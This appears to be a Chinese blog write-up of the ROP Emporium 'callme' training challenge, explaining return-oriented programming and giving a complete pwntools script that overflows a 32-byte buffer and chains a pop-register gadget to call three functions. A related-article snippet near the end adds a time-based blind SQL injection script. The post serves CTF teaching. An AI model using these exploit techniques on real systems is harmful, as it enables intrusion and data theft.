ROPEmporium通关全解(三)

最新推荐文章于 2022-04-21 16:45:26 发布
原创 最新推荐文章于 2022-04-21 16:45:26 发布 · 465 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了一种高级内存攻击技术ROP(返回导向编程),并以ROPEmporium平台上的callme系列挑战为例,逐步解析了如何利用ROP技术绕过现代操作系统的防御机制。文章重点介绍了ROP的原理,分析了目标二进制文件,利用ROP gadget进行参数传递,并最终成功调用callme_one, callme_two, callme_three函数获取flag。

前言
1.关于ROP
ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等)
ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。
2. 本系列rop实战题目的背景
来自ROPEmporium
旨在通过解决一系列挑战来一步步进阶学习ROP利用技术。

操作
来到第三关
首先看一下二进制文件的信息
在这里插入图片描述
可以看到nx为true,同样设置了栈不可执行
接下来在r2中加载分析
在这里插入图片描述
afl列出函数
在这里插入图片描述在上图中看到了此前出现过的main,pwnem,usefulFunction,不过这里比较有意思的是还出现了callme_one,callme_two,callme_three
我们看看题目的描述
在这里插入图片描述我们知道需要通过对应的顺序传入对应的参数才能得到flag
即:
callme_one(1,2,3),callme_two(1,2,3),callme_three(1,2,3)
每个函数都有三个参数
在进一步分析他们之前,我们先来看看main
在这里插入图片描述在上图中可以看到还是调用了pwnme
我们跟着分析pwnme,看看buffer的大小是否还是一样
在这里插入图片描述
可以看到缓冲区大小还是32字节,fgets函数容易造成缓冲区溢出
再看看usefulFunction中有什么
在这里插入图片描述从上图中可以看到是按照给出的参数、顺序来调用callme_1,2,3三个函数的
所以我们在写的exp时的依据就是这个
需要注意的是,传参时顺序是相反的
我们可以在这个网站(https://godbolt.org/)自己写一段简单的函数并且在main中调用,对照汇编分析
在这里插入图片描述为了将值放入用于传递参数的寄存器中,我们还要用到rop gadget,用于将值从栈pop到这些寄存器中
在这里插入图片描述在这儿找到一条符合条件的
在这里插入图片描述在0x401ab0,这个gadget可以将值从栈上pop到对应的三个寄存器上
这部分的exp比较长,我们直接用pwntools写,关键是四个地址,一个是rop gadget,已经知道了,另外三个是callme_1,2,3的地址,分别如下
在这里插入图片描述完整代码在3.py

from pwn import *

def add_arguments(payload):
    payload += p64(0x0000000000401ab0) # Address of gadget pop rdi; pop rsi; pop rdx; ret;
    payload += p64(0x1)
    payload += p64(0x2)
    payload += p64(0x3)
    return payload

offset = cyclic(40) # 40 bytes used to overflow.
payload = offset
payload = add_arguments(payload)
payload += p64(0x00401850) # Address of callme_one function.
payload = add_arguments(payload)
payload += p64(0x00401870) # Address of callme_two function.
payload = add_arguments(payload)
payload += p64(0x00401810) # Address of callme_three function.

sh = process('callme')
sh.recv()
sh.sendline(payload)
output = sh.recvall()
print(output)

运行结果如下
在这里插入图片描述

拿到了flag。


题目来自ROPEmporium,另参考如下资源:

https://medium.com/@int0x33/
https://paper.seebug.org/272/
https://www.rootnetsec.com/
https://bestwing.me/ropemporium-all-writeup.html
https://firmianay.github.io/2017/11/02/rop_emporium.html
https://www.oipapio.com/cn/article-5389490
http://ascii.911cha.com/
https://www.bejson.com/convert/ox2str/
https://larry.ngrep.me/2018/06/14/rop-emporium-write-up/
https://www.voidsecurity.in/2013/07/some-gadget-sequence-for-x8664-rop.html
https://www.blackhat.com/docs/asia-18/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR.pdf
https://www.blackhat.com/docs/asia-18/asia-18-Marco-return-to-csu-a-new-method-to-bypass-the-64-bit-Linux-ASLR-wp.pdf
https://www.jianshu.com/p/a9ad38ad33e5
https://zhuanlan.zhihu.com/p/27339191
https://www.voidsecurity.in/2013/07/some-gadget-sequence-for-x8664-rop.html

Elwood Ying
关注
ROP_Emporium_ret2win
Starr
03-23 803
文章目录1. ret2win32信息收集反汇编Exp2. ret2win反汇编Exp 题目下载地址:ROP Emporium 1. ret2win32 信息收集 $ file ret2win32 ret2win32: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=e1
小白详解rop emporium
BadRer的博客
08-02 2213
小白详解rop emporium 前言 rop emporium网站上提供了许多构造rop的challenge,作为小白的我从这里开始,专注于rop链的构造。 ps:写完放了好久结果没投出去,我好菜啊-。- 题目 0x0 ret2win32 IDA打开,很容易找到溢出点 char s; // [esp+0h][ebp-28h]可以看出s距ebp的偏移为0x28 m...
ROP Emporium-callme
网安星空
01-06 663
ROP Emporium网站CTF相关PWN靶场callme,主要是PWN栈溢出中ROP技巧的练习
ROP_Emporium_callme
Starr
03-24 1330
文章目录1. split32信息收集黑盒测试反汇编调试分析Exp2. split参考文章 1. split32 信息收集 这个题提供了以下文件: callme32可执行程序 libcallme32.so动态库 key1.dat,key2.dat encrypted_flag.dat 不知道callme32格式那里不对,checksec会报错NameError: name 'dt_rpath' is not defined。一会黑盒测试如果崩溃了就说明有canary,而pie可以从入口点判断: $ rea
rop emporium call me (x64)
u014377094的博客
02-10 1488
这道题惊喜点在于.so文件也可以拖到ida里逆向,服! 下面是题解过程: 左边发现奇怪的callme-one,two,three. 但是人家动态链接了,不知道内容是什么就无法利用,使用ida,把so文件拽里面 告诉我们,按这个参数就correctly了。 下面反倒过程平平无奇了 使用ROPgadget 找到个参数的pop rdi rsi rdx ret 注意:当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。用栈时右到左,但6.
ROP Emporium ALL Challenge
Pwnpanda的博客
07-18 1097
暑假刷题计划-0x00 水平有限,这些只是前面大部分题目的WP,最后几道题暂时没做 题目来源:ROP Emporium 工具&&环境:IDA Pro、gdb+peda、ROPgadget、radare2、Ubuntu 16 ROP: 一步一步学ROP之linux_x86篇 一步一步学ROP之linux_x64篇 友情链接: 大佬博客:https://firmian...
自考00600《高级英语》通关部曲
01-20
高级英语通关部曲第一部同义词辨析arguedebatev.都有争论辩论的意思argue暗示引证理由或证据来支持自己的观点主张或看法debate意思为正式辩论通常指在对立的两派或持有对立看法的人们之间
韩国通关号免费查询系统,韩国清关码校验
09-26
今天给大家带来的是韩国通关码反查纠错系统于2022年9月26日的升级内容介绍。 第一,系统以浏览器插件的形式呈现,后期将会一同发布网站系统。 第二,系统再次启用了批量通关码信息校验的功能,我们的老用户可能并...
upload-labs通关指南
01-22
《upload-labs通关指南》是一份针对upload_labs文件上传靶场的详细通关攻略文档。在网络安全领域,文件上传靶场是一个专门用于学习和研究文件上传漏洞攻防技术的平台。本指南不仅涵盖了客户端验证漏洞和多种服务端...
高项32小时通关.pdf
06-24
知识点:备考策略和技巧 - 高效的复习方法和时间管理 - 理论学习与实战案例分析的结合 - 重点知识点的梳理和记忆技巧 - 考前模拟题和历年真题的练习 知识点四:项目管理实践中的关键技能 - 项目启动、规划、执行...
WebGoat通关详解.zip
03-22
"WebGoat通关详解.zip"这个压缩包文件很可能包含了一步步指导用户如何完成WebGoat所有挑战的详细教程。 在描述中提到的"webgoat通关"意味着这个资源将带领用户了解如何解决WebGoat中的各种安全问题,从基础到高级,...
ROP Emporium 挑战 WP
hl1293348082的专栏
03-30 239
ROP Emporium 挑战是用来学习 ROP 技术的一系列挑战,本文就对于其中涉及的所有挑战记录一下 wirte up。 下载地址: https://ropemporium.com/ 虽然说简单,但是后面 badchar 后面的 rop 还是学到了不少东西的~ 程序默认开启 nx CANARY : disabled FORTIFY : disabled NX : ENABLED PIE : disabled RELRO : Partia...
适合初学者的ROP攻击入门教程 - [Pwn] ROP Emporium Guide
HiTaQini
06-08 3889
ROP Emporium 是一个ROP攻击入门教学网站,提供了一系列的挑战任务,这些挑战对逆向工程或debug的要求不高,因此对初学者十分友好,适合初学者了解ROP攻击。网站中共有8个挑战任务,每个挑战都引入了一个新概念/知识点,其复杂性和难度逐渐增加,循序渐进,而且每个挑战都有32/64位两个版本的程序,适合初学者了解二者之间的差异。
64位函数参数传递方式
热门推荐
qq_35467337的博客
03-08 1万+
64位函数传参方式
ROP Emporium x86_64 7~8题
CoLin的pwn小屋
04-21 511
ROP Emporium x64 7-8题
ROP Emporium x86_64 1~6题
CoLin的pwn小屋
04-09 3431
ROP Emporium x64 1-6题
ROPEmporium通关全解(一)
Yale的博客
12-24 1201
前言 关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 本系列rop实战题目的背景 来自ROPEmporium 旨在通...
ROPEmporium通关全解(五)
Yale的博客
12-24 468
前言 1.关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 2. 本系列rop实战题目的背景 来自ROPEmporium...
ROPEmporium通关全解(二)
Yale的博客
12-24 482
前言 关于ROP ROP的全称为Return-oriented programming(返回导向编程),这是一种高级的内存攻击技术可以用来绕过现代操作系统的各种通用防御(比如内存不可执行和代码签名等) ROP是一种攻击技术,其中攻击者使用堆栈的控制来在现有程序代码中的子程序中的返回指令之前,立即间接地执行精心挑选的指令或机器指令组。 本系列rop实战题目的背景 来自ROPEmporium 旨在通...
sqli-labs通关全解
最新发布
04-27
### 关于 SQLi-Labs 的全面解决方案 SQLi-Labs 是一款经典的 Web 安全学习工具,主要用于练习和掌握 SQL 注入技术。以下是针对 SQLi-Labs 靶场的全部关卡解决方案概述。 #### 一、基础环境搭建 在开始解决各个关卡之前,需要确保靶场已成功部署并运行正常。可以通过以下方式完成安装: - 下载 SQLi-Labs 源码包,并将其放置到本地服务器的 `www` 或者 `htdocs` 文件夹下。 - 启动 Apache 和 MySQL 服务后,在浏览器中输入地址 `http://127.0.0.1/` 访问站点[^2]。 如果遇到权限问题或者无法创建临时文件的情况,则需调整目标目录的读写权限设置[^3]。 #### 二、各关卡解析思路概览 ##### Less-1 到 Less-4 这些初级题目主要考察基本的手工注入技巧以及如何利用单引号闭合查询条件来绕过验证机制。例如,在第32关里提到的方法同样适用于此阶段——即尝试向参数附加特殊字符如 `%df`,进而观察返回结果的变化情况从而推测内部逻辑结构[^1]。 ##### 中级挑战 (Less-5 至 Less-16) 随着难度增加,中级部分引入了更多复杂的场景比如时间延迟型盲注(Time-based Blind Injection),布尔型盲注(Boolean-based Blind Injection)等概念。对于这类问题通常采用如下策略: ###### 时间基线测试法 当面对不可见反馈信息时,可通过构造特定payload让数据库执行耗时操作以间接获知某些细节。举个例子来说就是下面这个Python脚本片段展示了如何去探测当前使用的DBMS版本号的一部分内容: ```python import time import requests def get_db_version(): version = "" index = 1 while True: found_char = False for char_code in range(33, 126): # ASCII printable characters payload = f"' OR IF(SUBSTRING(@@version,{index},1)=CHAR({char_code}),SLEEP(5),NULL)-- " start_time = time.time() try: res = requests.get(f"http://target-site.com/vulnerable-page?id={payload}") elapsed_time = time.time() - start_time if elapsed_time >= 5: version += chr(char_code) print(f"[+] Found character: {chr(char_code)}") index += 1 found_char = True break except Exception as e: pass if not found_char: break return version print(get_db_version()) ``` 上述代码通过不断改变SUBSTRING函数中的位置索引来逐字提取数据表的名字或者其他敏感资料[^4]。 ##### 高阶难题 (Beyond Level 16) 更高层次的任务往往涉及到联合查询 UNION SELECT ,堆叠式多条命令 Stacked Queries 及其他高级手法的应用场合。此时除了要具备扎实的基础理论功底之外还需要灵活运用各种编程语言编写自动化攻击程序辅助分析过程。 --- ### 注意事项 尽管本文提供了大量实用的技术指导方针,但在实际动手实践过程中仍需注意安全伦理规范,仅限于授权范围内的渗透测试活动之中应用所学知识技能。
评论 1
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值